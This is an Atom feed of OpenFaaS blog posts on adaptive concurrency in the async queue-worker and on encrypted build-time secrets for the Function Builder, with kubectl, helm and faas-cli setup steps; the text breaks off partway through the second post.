<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://www.openfaas.com/feed.xml" rel="self" type="application/atom+xml" /><link href="https://www.openfaas.com/" rel="alternate" type="text/html" /><updated>2026-04-10T09:04:56+00:00</updated><id>https://www.openfaas.com/feed.xml</id><title type="html">OpenFaaS - Serverless Functions Made Simple</title><subtitle>OpenFaaS - Serverless Functions Made Simple</subtitle><author><name>OpenFaaS Ltd</name></author><entry><title type="html">What Adaptive Concurrency Means for Async Functions</title><link href="https://www.openfaas.com/blog/adaptive-concurrency/" rel="alternate" type="text/html" title="What Adaptive Concurrency Means for Async Functions" /><published>2026-04-02T00:00:00+00:00</published><updated>2026-04-02T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/adaptive-concurrency</id><content type="html" xml:base="https://www.openfaas.com/blog/adaptive-concurrency/"><![CDATA[<p>Learn how adaptive concurrency in the OpenFaaS queue-worker prevents overloading functions, reduces retries, and completes async batches faster — without per-function tuning.</p>

<h2 id="synchronous-vs-asynchronous-invocation">Synchronous vs. asynchronous invocation</h2>

<p>Any OpenFaaS function can be called synchronously (the default) or asynchronously via a queue. The difference is similar to calling a function and waiting for its return value, versus deferring work — like <code class="language-plaintext highlighter-rouge">defer</code> in Go, <code class="language-plaintext highlighter-rouge">async/await</code> in Node/Python, or submitting a job to a batch-processing queue.</p>

<p><strong>Synchronous — caller waits for the result</strong></p>

<p><img src="/images/2026-03-adaptive-concurrency/sync-flow.svg" alt="Synchronous invocation flow" /></p>

<p>The caller sends an HTTP request and waits. The gateway proxies it to the function and streams the response back. Simple and direct, but the caller is blocked for the full duration — if the function takes 5 minutes, the caller waits 5 minutes.</p>

<p><strong>Asynchronous — caller returns immediately, work is processed in the background</strong></p>

<p><img src="/images/2026-03-adaptive-concurrency/async-flow.svg" alt="Asynchronous invocation flow" /></p>

<p>The caller sends a request to <code class="language-plaintext highlighter-rouge">/async-function/&lt;name&gt;</code> and gets back a <code class="language-plaintext highlighter-rouge">202 Accepted</code> with a <code class="language-plaintext highlighter-rouge">X-Call-Id</code> within milliseconds. The gateway serialises the request onto a NATS JetStream queue. The queue-worker subscribes, pulls messages off the queue, and invokes the function. If a <code class="language-plaintext highlighter-rouge">X-Callback-Url</code> header was provided, the result is POSTed there when done.</p>

<p>This is a hybrid of a batch-job queue and deferred execution — think of it as submitting a job and optionally subscribing to the result. It is ideal for long-running work, batch processing, webhooks with tight response-time contracts, and fan-out pipelines.</p>

<h2 id="where-queue-worker-dispatch-falls-short">Where queue-worker dispatch falls short</h2>

<p>By default the queue-worker uses <em>greedy</em> dispatch — pulling messages and sending them to the function as fast as possible. This works well and is used widely in production, but for functions with strict concurrency limits it can cause excessive retries, and requires careful per-function tuning for optimal performance.</p>

<p><em>Adaptive concurrency</em> is a new dispatch mode that fixes this. The queue-worker learns each function’s capacity and throttles dispatch to match automatically. It addresses two problems in particular:</p>

<ul>
  <li><strong>Known concurrency limit</strong> — the function has <code class="language-plaintext highlighter-rouge">max_inflight</code> set, capping concurrent requests per replica. The total capacity changes as replicas scale up and down.</li>
  <li><strong>Variable upstream capacity</strong> — the function depends on an external resource — a database, a third-party API — that can slow down or become overloaded. The function signals back-pressure by returning <code class="language-plaintext highlighter-rouge">429</code> itself.</li>
</ul>

<h2 id="how-adaptive-concurrency-solves-this">How adaptive concurrency solves this</h2>

<p>Adaptive concurrency removes the tuning burden. Instead of dispatching as fast as possible and dealing with rejections, the queue-worker <strong>learns how much work each function can handle</strong> and throttles the dispatch rate to match automatically.</p>

<p>The result:</p>

<ul>
  <li><strong>Fewer retries</strong> — requests are held in the queue until the function can accept them</li>
  <li><strong>Faster batch completion</strong> — no time wasted in exponential back-off</li>
  <li><strong>No per-function tuning</strong> — the algorithm adapts to each function’s behaviour on its own</li>
  <li><strong>Handles dynamic capacity</strong> — automatically adjusts as replicas scale up and down or upstream capacity changes</li>
</ul>

<p><img src="/images/2026-03-adaptive-concurrency/greedy-vs-adaptive-diagram.svg" alt="Greedy dispatch vs adaptive concurrency" /></p>

<h2 id="why-does-the-default-approach-generate-retries">Why does the default approach generate retries?</h2>

<p>Without adaptive concurrency, the queue-worker uses what we call a <em>greedy</em> dispatch algorithm. It pulls messages from the NATS JetStream queue and sends them to the function as fast as possible. When a function has <code class="language-plaintext highlighter-rouge">max_inflight</code> set — say to 5 per replica — the first 5 requests succeed, and the rest are rejected with 429 status codes.</p>

<p>The queue-worker then retries the rejected requests with exponential back-off. As the autoscaler adds more replicas, capacity increases, more requests succeed, and the backlog eventually clears. But during this ramp-up period, a large proportion of the requests are retried one or more times.</p>

<h2 id="how-adaptive-concurrency-works">How adaptive concurrency works</h2>

<p>Adaptive concurrency flips the approach. Instead of dispatching as fast as possible and dealing with rejections, it learns the function’s capacity and throttles dispatch to match.</p>

<p>The algorithm is feedback-driven:</p>

<ol>
  <li><strong>Start low</strong> — the queue-worker begins with a concurrency limit of zero for each function and grows it incrementally based on real responses.</li>
  <li><strong>Increase on success</strong> — after receiving a successful response, the limit is increased. After a sustained period without rejections, it scales up more aggressively.</li>
  <li><strong>Back off on rejection</strong> — after consecutive <code class="language-plaintext highlighter-rouge">429</code> responses, the limit is reduced with a safety margin below the discovered maximum to avoid repeatedly hitting the ceiling.</li>
  <li><strong>Proactive scaling</strong> — the queue-worker periodically checks whether there’s a backlog of queued work. If there is, it proactively increases the concurrency limit to fill available capacity.</li>
  <li><strong>Adapt to replica changes</strong> — as the autoscaler adds or removes replicas, the function’s ability to accept requests changes. The algorithm detects this through the success/failure feedback loop and adjusts accordingly.</li>
</ol>

<p>The net effect is that the queue-worker holds messages in the queue until the function can accept them, rather than sending them only to have them rejected and retried.</p>

<h2 id="greedy-vs-adaptive-concurrency--a-side-by-side-comparison">Greedy vs. adaptive concurrency — a side-by-side comparison</h2>

<p>To show the difference, we ran the same workload with both approaches. We deployed the <code class="language-plaintext highlighter-rouge">sleep</code> function from the OpenFaaS store with a <code class="language-plaintext highlighter-rouge">max_inflight</code> of 5 and a maximum of 10 replicas, then submitted a batch of asynchronous invocations.</p>

<p><a href="/images/2026-03-adaptive-concurrency/greedy-vs-adaptive.png"><img src="/images/2026-03-adaptive-concurrency/greedy-vs-adaptive.png" alt="Side by side comparison of greedy vs adaptive concurrency" /></a></p>

<p>The key results:</p>

<ul>
  <li><strong>~50% faster completion time</strong> — adaptive concurrency completed the same batch of work approximately 50% quicker than the greedy approach.</li>
  <li><strong>Significantly fewer retries</strong> — with greedy dispatch, a large proportion of requests were retried (indicated by the rate of 429 responses in the Request Rate graph). Adaptive concurrency had far fewer, with the vast majority of requests completing on the first attempt.</li>
  <li><strong>Consistent invocation load</strong> — instead of the burst-and-retry pattern visible with the greedy approach (Gateway Inflight Requests graph), adaptive concurrency maintained a more constant rate of in-flight requests, smoothly utilising available capacity.</li>
  <li><strong>Lower overall resource usage</strong> — the greedy approach pushed the number of replicas higher in some tests due to the background noise from 429 retries inflating the perceived load on the system.</li>
</ul>

<p>The fundamental insight is simple: the fewer the retries, the lower the cumulative exponential back-off time, and the shorter the overall processing time.</p>

<h2 id="when-to-use-adaptive-concurrency">When to use adaptive concurrency</h2>

<p>Adaptive concurrency helps whenever function capacity is limited — whether that limit is known upfront or varies at runtime. It works with any autoscaling mode (capacity, queue-based, RPS) and the queue-worker learns the capacity regardless of how replicas are being scaled.</p>

<h3 id="functions-with-a-known-concurrency-limit">Functions with a known concurrency limit</h3>

<p>When a function has <code class="language-plaintext highlighter-rouge">max_inflight</code> set, each replica can only handle a fixed number of concurrent requests. This is the most common case and is ideal for:</p>

<ul>
  <li><strong>PDF generation</strong> — headless Chrome with Puppeteer can only run 1–2 browsers per replica</li>
  <li><strong>ML inference</strong> — a GPU-bound model serving function where only one inference can run at a time (<code class="language-plaintext highlighter-rouge">max_inflight=1</code>)</li>
  <li><strong>Video transcoding / image processing</strong> — CPU or memory-intensive work where each replica handles a small number of jobs</li>
  <li><strong>Data ETL</strong> — batch processing pipelines where each step has a bounded throughput</li>
</ul>

<p>The right <code class="language-plaintext highlighter-rouge">max_inflight</code> value depends on your function — it may require experimentation and monitoring to find the optimal setting. Once set, adaptive concurrency handles the rest.</p>

<p><strong>Example: PDF generation at scale</strong></p>

<p>In a previous post, <a href="/blog/pdf-generation-at-scale-on-kubernetes/">Generate PDFs at scale on Kubernetes</a>, we showed how to run headless Chrome with Puppeteer to generate hundreds of PDFs. Each replica can only run a small number of browsers at once, so <code class="language-plaintext highlighter-rouge">max_inflight</code> is set to 1 or 2. When a batch of 600 pages hits the queue, the greedy dispatch approach floods the function with requests, most of which are rejected with 429s. To get good results, you had to carefully tune the retry configuration — <code class="language-plaintext highlighter-rouge">maxRetryWait</code>, <code class="language-plaintext highlighter-rouge">initialRetryWait</code>, and <code class="language-plaintext highlighter-rouge">maxRetryAttempts</code> — and even then a large portion of the processing time was spent in exponential back-off.</p>

<p>With adaptive concurrency, the queue-worker learns that each replica can handle just one or two browsers and throttles dispatch to match. As replicas scale up, the concurrency limit rises automatically. The queue drains faster because requests aren’t wasted on retries, and you don’t need to tune retry parameters to get optimal throughput.</p>

<h3 id="functions-with-variable-upstream-capacity">Functions with variable upstream capacity</h3>

<p>Not every capacity limit is known in advance. Some functions depend on external resources that can slow down or become temporarily unavailable:</p>

<ul>
  <li><strong>Database-backed functions</strong> — a downstream database under heavy load starts timing out or rejecting connections</li>
  <li><strong>Third-party API calls</strong> — an external service applies its own rate limiting or experiences degraded performance</li>
  <li><strong>Shared upstream services</strong> — a microservice your function depends on is overloaded and responding slowly</li>
</ul>

<p>In these cases, the function itself can return a <code class="language-plaintext highlighter-rouge">429</code> status code to signal back-pressure to the queue-worker. The adaptive concurrency algorithm responds the same way — it reduces the dispatch rate, waits, and probes for recovery. When the upstream resource recovers, the concurrency limit climbs back up automatically.</p>

<p>This means you don’t need <code class="language-plaintext highlighter-rouge">max_inflight</code> to benefit from adaptive concurrency. As long as your function returns <code class="language-plaintext highlighter-rouge">429</code> when it can’t handle more work, the queue-worker will adapt.</p>

<h2 id="try-it-out">Try it out</h2>

<p>Adaptive concurrency is enabled by default when using <code class="language-plaintext highlighter-rouge">function</code> mode in the JetStream queue-worker. If you’re already running function mode and you are on the latest OpenFaaS release, you’re using it.</p>

<p>Deploy a function with a concurrency limit and capacity-based autoscaling:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli store deploy <span class="nb">sleep</span> <span class="se">\</span>
  <span class="nt">--label</span> com.openfaas.scale.max<span class="o">=</span>10 <span class="se">\</span>
  <span class="nt">--label</span> com.openfaas.scale.target<span class="o">=</span>5 <span class="se">\</span>
  <span class="nt">--label</span> com.openfaas.scale.type<span class="o">=</span>capacity <span class="se">\</span>
  <span class="nt">--label</span> com.openfaas.scale.target-proportion<span class="o">=</span>0.9 <span class="se">\</span>
  <span class="nt">--env</span> <span class="nv">max_inflight</span><span class="o">=</span>5
</code></pre></div></div>

<p>Submit a batch of asynchronous invocations:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hey <span class="nt">-m</span> POST <span class="nt">-n</span> 500 <span class="nt">-c</span> 4 <span class="se">\</span>
  http://127.0.0.1:8080/async-function/sleep
</code></pre></div></div>

<p>Watch the Grafana dashboard for the queue-worker to see adaptive concurrency in action. You’ll see the concurrency limit climb as replicas scale up, then stabilise as capacity is matched.</p>

<p><img src="/images/2026-03-adaptive-concurrency/grafana-queue-depth-and-inflight.png" alt="Pending messages draining as inflight requests ramp up" /></p>
<blockquote>
  <p>The queue depth drops steadily as the queue-worker increases inflight requests in step with available capacity — no sudden spikes or idle periods.</p>
</blockquote>

<p><img src="/images/2026-03-adaptive-concurrency/grafana-load-replicas-and-status.png" alt="Current load, replicas, and invocation rate by status code" /></p>
<blockquote>
  <p>As replicas scale from 1 to 6, the in-flight load climbs smoothly to ~25. The <code class="language-plaintext highlighter-rouge">429</code> response rate stays low throughout — the queue-worker throttles dispatch to match capacity rather than flooding the function with requests.</p>
</blockquote>

<h2 id="further-reading">Further reading</h2>

<ul>
  <li><a href="https://docs.openfaas.com/openfaas-pro/jetstream/">Queue Worker documentation</a> — full reference for queue-worker configuration, including adaptive concurrency.</li>
  <li><a href="/blog/queue-based-scaling/">Queue-Based Scaling for Functions</a> — a complementary scaling mode that matches replicas to queue depth.</li>
  <li><a href="/blog/pdf-generation-at-scale-on-kubernetes/">Generate PDFs at scale on Kubernetes</a> — a real-world example of batch processing with concurrency limits that benefits from adaptive concurrency.</li>
  <li><a href="/blog/nested-functions-critical-path/">How to process your data the resilient way with back pressure</a> — an introduction to back pressure and concurrency limits in OpenFaaS.</li>
</ul>

<h2 id="wrapping-up">Wrapping up</h2>

<p>The greedy dispatch algorithm has served OpenFaaS customers well and continues to be a reliable option. But for workloads with hard concurrency limits, adaptive concurrency is a meaningful improvement: it completes the same work faster by avoiding unnecessary retries, requires less per-function tuning, and makes better use of available capacity as functions scale up and down.</p>

<p>It’s enabled by default in function mode — no changes needed to start benefiting from it.</p>

<p>To disable adaptive concurrency and revert to greedy dispatch, set the following in your OpenFaaS Helm values:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">jetstreamQueueWorker</span><span class="pi">:</span>
  <span class="na">adaptiveConcurrency</span><span class="pi">:</span> <span class="no">false</span>
</code></pre></div></div>

<p>If you have questions, or want to share results from your own workloads, reach out to us via your support channel of choice whether that’s Slack, the Customer Community on GitHub, or Email.</p>]]></content><author><name>OpenFaaS Ltd</name></author><category term="queue" /><category term="async" /><category term="autoscaling" /><category term="kubernetes" /><category term="batch-processing" /><summary type="html"><![CDATA[Learn how adaptive concurrency in the OpenFaaS queue-worker matches processing capacity to function replicas, reducing retries and async invocation batches faster.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2026-03-adaptive-concurrency/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2026-03-adaptive-concurrency/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Encrypt build-time secrets for the Function Builder</title><link href="https://www.openfaas.com/blog/encrypted-build-secrets/" rel="alternate" type="text/html" title="Encrypt build-time secrets for the Function Builder" /><published>2026-03-24T00:00:00+00:00</published><updated>2026-03-24T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/encrypted-build-secrets</id><content type="html" xml:base="https://www.openfaas.com/blog/encrypted-build-secrets/"><![CDATA[<p>Learn how to pass private registry tokens, API keys, and certificates into the Function Builder - encrypted end-to-end.</p>

<h2 id="introduction">Introduction</h2>

<p>Build secrets are already supported for <a href="https://docs.openfaas.com/cli/build/#plugins-and-build-time-secrets">local builds and CI jobs</a> using <code class="language-plaintext highlighter-rouge">faas-cli pro build</code>. In that workflow, the secret files live on the build machine and are mounted directly into Docker’s BuildKit. There’s no network transport involved.</p>

<p>The <a href="https://docs.openfaas.com/openfaas-pro/builder/">Function Builder API</a> is different. It’s designed for building untrusted code from third parties  - your customers. A SaaS platform takes user-supplied source code, sends it to the builder over HTTP, and gets back a container image. The build happens in-cluster, without Docker, without root, and without sharing a Docker socket.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>                           Kubernetes cluster
                          ┌──────────────────────────────┐
  faas-cli /              │                              │
  Your API/dashboard      │  pro-builder      buildkit   │   registry
  ┌───────────────┐       │  ┌──────────┐  ┌──────────┐  │  ┌─────────┐
  │  source code  │──tar──│─▶│  unseal  │──│  build   │──│─▶│  image  │
  │  + sealed     │ HTTP  │  │  secrets │  │  + push  │  │  │         │
  │    secrets    │ HMAC  │  └──────────┘  └──────────┘  │  └─────────┘
  └───────────────┘       │                              │
                          └──────────────────────────────┘
</code></pre></div></div>

<p>The question is: what happens when those builds need access to private resources? A Python function might need to <code class="language-plaintext highlighter-rouge">pip install</code> from a private PyPI registry. A Node.js function might need packages from a private npm registry. A function might need a private CA certificate to pull dependencies from an internal mirror.</p>

<p>Since the Function Builder launched, most customers haven’t needed build-time credentials  - Go users vendor their dependencies, and many teams use public registries. Others have found workarounds where they could. But as platforms mature and customer requirements evolve, the need for private package registries comes up.</p>

<p><a href="https://waylay.io">Waylay.io</a> has been using the Function Builder since 2021 to build functions for their industrial IoT and automation platform. As their customers started needing pip modules from private registries, they reached out and we worked together to develop a proper solution. Build secrets use Docker’s <code class="language-plaintext highlighter-rouge">--mount=type=secret</code> mechanism, which means credentials are only available during the specific <code class="language-plaintext highlighter-rouge">RUN</code> instruction that needs them  - they never end up in image layers and they’re not visible in <code class="language-plaintext highlighter-rouge">docker history</code>. We added NaCl box encryption (Curve25519 + XSalsa20-Poly1305) on top so that secrets are protected over the wire between the client and the builder, even over plain HTTP.</p>

<p>The result is a new feature in the Function Builder that lets you pass secrets into <code class="language-plaintext highlighter-rouge">RUN --mount=type=secret</code> instructions in your Dockerfiles. The secrets are encrypted client-side by <code class="language-plaintext highlighter-rouge">faas-cli</code> using the builder’s public key, included in the build tar, and decrypted in-memory by the builder just before the build runs. They never appear in image layers, they’re never written to disk in plaintext, and they never travel in plaintext over the wire  - even if the connection between your client and the builder is plain HTTP.</p>

<h2 id="how-it-works">How it works</h2>

<p>The builder generates a Curve25519 keypair at startup. The public key is available via a <code class="language-plaintext highlighter-rouge">/publickey</code> endpoint. When <code class="language-plaintext highlighter-rouge">faas-cli</code> sends a build with secrets, it:</p>

<ol>
  <li>Encrypts each secret value independently using NaCl box</li>
  <li>Includes the sealed secrets in the build tar as <code class="language-plaintext highlighter-rouge">com.openfaas.secrets</code></li>
  <li>Signs the entire tar with HMAC-SHA256 (as before)</li>
</ol>

<p>The builder receives the tar, validates the HMAC, extracts the sealed file, decrypts each value using its private key, and passes them to BuildKit as <code class="language-plaintext highlighter-rouge">--mount=type=secret</code> mounts. After the build, the decrypted values are discarded.</p>

<p>The sealed file format uses per-value encryption with visible key names, so you can see which secrets are included without being able to read their values:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">version</span><span class="pi">:</span> <span class="s">v1</span>
<span class="na">algorithm</span><span class="pi">:</span> <span class="s">nacl/box</span>
<span class="na">key_id</span><span class="pi">:</span> <span class="s">TrZKmwyy</span>
<span class="na">public_key</span><span class="pi">:</span> <span class="s">TrZKmwyyTHBflZBF98y/j/2vn8wDZsMkX7yvUUGLUUM=</span>
<span class="na">secrets</span><span class="pi">:</span>
    <span class="na">api_key</span><span class="pi">:</span> <span class="s">&lt;encrypted&gt;</span>
    <span class="na">pip_index_url</span><span class="pi">:</span> <span class="s">&lt;encrypted&gt;</span>
</code></pre></div></div>

<p>This means the file is safe to commit to git. You get an audit trail of which keys were added or removed, and you can see when a value has changed by its ciphertext  - all without needing the private key.</p>

<h2 id="part-a-setting-up-the-builder-with-build-secrets">Part A: Setting up the builder with build secrets</h2>

<p>The following steps let you try the full workflow on a local KinD cluster before moving to a live environment. You’ll need <code class="language-plaintext highlighter-rouge">faas-cli</code> 0.18.6 or later, <code class="language-plaintext highlighter-rouge">helm</code>, <code class="language-plaintext highlighter-rouge">kubectl</code>, <code class="language-plaintext highlighter-rouge">kind</code>, and an OpenFaaS for Enterprises license.</p>

<h3 id="create-a-test-cluster">Create a test cluster</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kind create cluster <span class="nt">--name</span> build-secrets-test
</code></pre></div></div>

<h3 id="create-the-namespace-and-license-secret">Create the namespace and license secret</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl create namespace openfaas

kubectl create secret generic openfaas-license <span class="se">\</span>
  <span class="nt">-n</span> openfaas <span class="se">\</span>
  <span class="nt">--from-file</span> <span class="nv">license</span><span class="o">=</span><span class="nv">$HOME</span>/.openfaas/LICENSE
</code></pre></div></div>

<h3 id="create-a-registry-credential-secret">Create a registry credential secret</h3>

<p>For testing, we’ll use <a href="https://ttl.sh">ttl.sh</a> which is a free ephemeral registry that doesn’t require authentication:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> <span class="o">&lt;&lt;</span><span class="sh">'</span><span class="no">EOF</span><span class="sh">' &gt; ttlsh-config.json
{"auths":{}}
</span><span class="no">EOF

</span>kubectl create secret generic registry-secret <span class="se">\</span>
  <span class="nt">-n</span> openfaas <span class="se">\</span>
  <span class="nt">--from-file</span> config.json<span class="o">=</span>./ttlsh-config.json
</code></pre></div></div>

<p>For a private registry, see the <a href="https://github.com/openfaas/faas-netes/tree/master/chart/pro-builder">helm chart README</a> for how to configure authentication.</p>

<h3 id="generate-secrets">Generate secrets</h3>

<p>Two things are needed: a keypair for encrypting build secrets, and a payload secret for HMAC request signing.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret keygen
faas-cli secret generate <span class="nt">-o</span> payload.txt
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Wrote private key: key
Wrote public key:  key.pub
Key ID:            TrZKmwyy
</code></pre></div></div>

<h3 id="create-the-kubernetes-secrets">Create the Kubernetes secrets</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl create secret generic <span class="nt">-n</span> openfaas <span class="se">\</span>
  payload-secret <span class="nt">--from-file</span> payload-secret<span class="o">=</span>payload.txt

kubectl create secret generic <span class="nt">-n</span> openfaas <span class="se">\</span>
  pro-builder-build-secrets-key <span class="nt">--from-file</span> <span class="nv">key</span><span class="o">=</span>./key
</code></pre></div></div>

<h3 id="deploy-the-builder">Deploy the builder</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm repo add openfaas https://openfaas.github.io/faas-netes/
helm repo update

helm upgrade pro-builder openfaas/pro-builder <span class="se">\</span>
  <span class="nt">--install</span> <span class="nt">-n</span> openfaas <span class="se">\</span>
  <span class="nt">--set</span> buildSecrets.privateKeySecret<span class="o">=</span>pro-builder-build-secrets-key
</code></pre></div></div>

<p>Wait for it to be ready:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl rollout status deployment/pro-builder <span class="nt">-n</span> openfaas
</code></pre></div></div>

<h3 id="verify">Verify</h3>

<p>Port-forward and check the public key endpoint:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl port-forward <span class="nt">-n</span> openfaas deploy/pro-builder 8081:8080 &amp;

curl <span class="nt">-s</span> http://127.0.0.1:8081/publickey | jq
</code></pre></div></div>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"key_id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TrZKmwyy"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"algorithm"</span><span class="p">:</span><span class="w"> </span><span class="s2">"nacl/box"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"public_key"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TrZKmwyyTHBflZBF98y/j/2vn8wDZsMkX7yvUUGLUUM="</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">key_id</code> is derived from the public key automatically. You don’t need to configure it. The builder is ready.</p>

<h2 id="part-b-building-a-function-with-secrets">Part B: Building a function with secrets</h2>

<p>Let’s walk through a complete example. We’ll create a function that reads a secret at build time using the classic watchdog.</p>

<h3 id="create-the-function">Create the function</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli new <span class="nt">--prefix</span> ttl.sh/test-build-secrets <span class="se">\</span>
  <span class="nt">--lang</span> dockerfile sealed-test
</code></pre></div></div>

<p>Replace <code class="language-plaintext highlighter-rouge">sealed-test/Dockerfile</code> with:</p>

<div class="language-Dockerfile highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">FROM</span><span class="w"> </span><span class="s">ghcr.io/openfaas/classic-watchdog:latest</span><span class="w"> </span><span class="k">AS</span><span class="w"> </span><span class="s">watchdog</span>

<span class="k">FROM</span><span class="s"> alpine:3.22.0</span>

<span class="k">COPY</span><span class="s"> --from=watchdog /fwatchdog /usr/bin/fwatchdog</span>

<span class="k">RUN </span><span class="nb">mkdir</span> <span class="nt">-p</span> /home/app

<span class="k">RUN </span><span class="nt">--mount</span><span class="o">=</span><span class="nb">type</span><span class="o">=</span>secret,id<span class="o">=</span>api_key <span class="se">\
</span>    <span class="nb">cat</span> /run/secrets/api_key <span class="o">&gt;</span> /home/app/api_key.txt

<span class="k">ENV</span><span class="s"> fprocess="cat /home/app/api_key.txt"</span>

<span class="k">CMD</span><span class="s"> ["fwatchdog"]</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">--mount=type=secret,id=api_key</code> line tells BuildKit to mount the secret at <code class="language-plaintext highlighter-rouge">/run/secrets/api_key</code> during that <code class="language-plaintext highlighter-rouge">RUN</code> step. It’s only available during the build  - it doesn’t end up in any image layer.</p>

<p>Edit <code class="language-plaintext highlighter-rouge">stack.yaml</code> to add <code class="language-plaintext highlighter-rouge">build_secrets</code>:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">version</span><span class="pi">:</span> <span class="m">1.0</span>
<span class="na">provider</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas</span>
  <span class="na">gateway</span><span class="pi">:</span> <span class="s">http://127.0.0.1:8080</span>
<span class="na">functions</span><span class="pi">:</span>
  <span class="na">sealed-test</span><span class="pi">:</span>
    <span class="na">lang</span><span class="pi">:</span> <span class="s">dockerfile</span>
    <span class="na">handler</span><span class="pi">:</span> <span class="s">./sealed-test</span>
    <span class="na">image</span><span class="pi">:</span> <span class="s">ttl.sh/test-build-secrets/sealed-test:2h</span>
    <span class="na">build_secrets</span><span class="pi">:</span>
      <span class="na">api_key</span><span class="pi">:</span> <span class="s">sk-live-my-secret-key</span>
</code></pre></div></div>

<h3 id="build-with-the-remote-builder">Build with the remote builder</h3>

<p>If you don’t already have the payload secret file locally, fetch it from the cluster:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>kubectl get secret <span class="nt">-n</span> openfaas payload-secret <span class="se">\</span>
  <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s1">'{.data.payload-secret}'</span> | <span class="nb">base64</span> <span class="nt">--decode</span><span class="si">)</span>
<span class="nb">echo</span> <span class="nv">$PAYLOAD</span> <span class="o">&gt;</span> payload.txt
</code></pre></div></div>

<p>If you don’t have the public key file, fetch it from the builder:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> http://127.0.0.1:8081/publickey | jq <span class="nt">-r</span> <span class="s1">'.public_key'</span> <span class="o">&gt;</span> key.pub
</code></pre></div></div>

<p>Then publish:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli publish <span class="se">\</span>
  <span class="nt">-f</span> stack.yaml <span class="se">\</span>
  <span class="nt">--remote-builder</span> http://127.0.0.1:8081 <span class="se">\</span>
  <span class="nt">--payload-secret</span> ./payload.txt <span class="se">\</span>
  <span class="nt">--builder-public-key</span> ./key.pub
</code></pre></div></div>

<p>The secrets are encrypted by <code class="language-plaintext highlighter-rouge">faas-cli</code> before sending. You’ll see the build logs streamed back:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[0] &gt; Building sealed-test.
Building: ttl.sh/test-build-secrets/sealed-test:2h with dockerfile template. Please wait..
2026-03-24T11:15:13Z [stage-1 2/4] COPY --from=watchdog /fwatchdog /usr/bin/fwatchdog
2026-03-24T11:15:13Z [stage-1 3/4] RUN mkdir -p /home/app
2026-03-24T11:15:13Z [stage-1 4/4] RUN --mount=type=secret,id=api_key ...
2026-03-24T11:15:14Z exporting to image
sealed-test success building and pushing image: ttl.sh/test-build-secrets/sealed-test:2h
</code></pre></div></div>

<h3 id="verify-1">Verify</h3>

<p>Run the image and invoke the watchdog:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run <span class="nt">--rm</span> <span class="nt">-d</span> <span class="nt">-p</span> 8081:8080 <span class="nt">--name</span> sealed-test <span class="se">\</span>
  ttl.sh/test-build-secrets/sealed-test:2h

curl <span class="nt">-s</span> http://127.0.0.1:8081

docker stop sealed-test
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sk-live-my-secret-key
</code></pre></div></div>

<p>The secret was encrypted on the client, sent over the wire inside the build tar, decrypted by the builder, and mounted into the Dockerfile during the build.</p>

<h3 id="a-real-world-example-private-pypi-registry">A real-world example: private PyPI registry</h3>

<p>In production, you’d use this to pass credentials for private package registries. Here’s what that would look like for a Python function using the <code class="language-plaintext highlighter-rouge">python3-http</code> template.</p>

<p>In your <code class="language-plaintext highlighter-rouge">stack.yaml</code>:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">functions</span><span class="pi">:</span>
  <span class="na">data-processor</span><span class="pi">:</span>
    <span class="na">lang</span><span class="pi">:</span> <span class="s">python3-http</span>
    <span class="na">handler</span><span class="pi">:</span> <span class="s">./data-processor</span>
    <span class="na">image</span><span class="pi">:</span> <span class="s">registry.example.com/data-processor:latest</span>
    <span class="na">build_secrets</span><span class="pi">:</span>
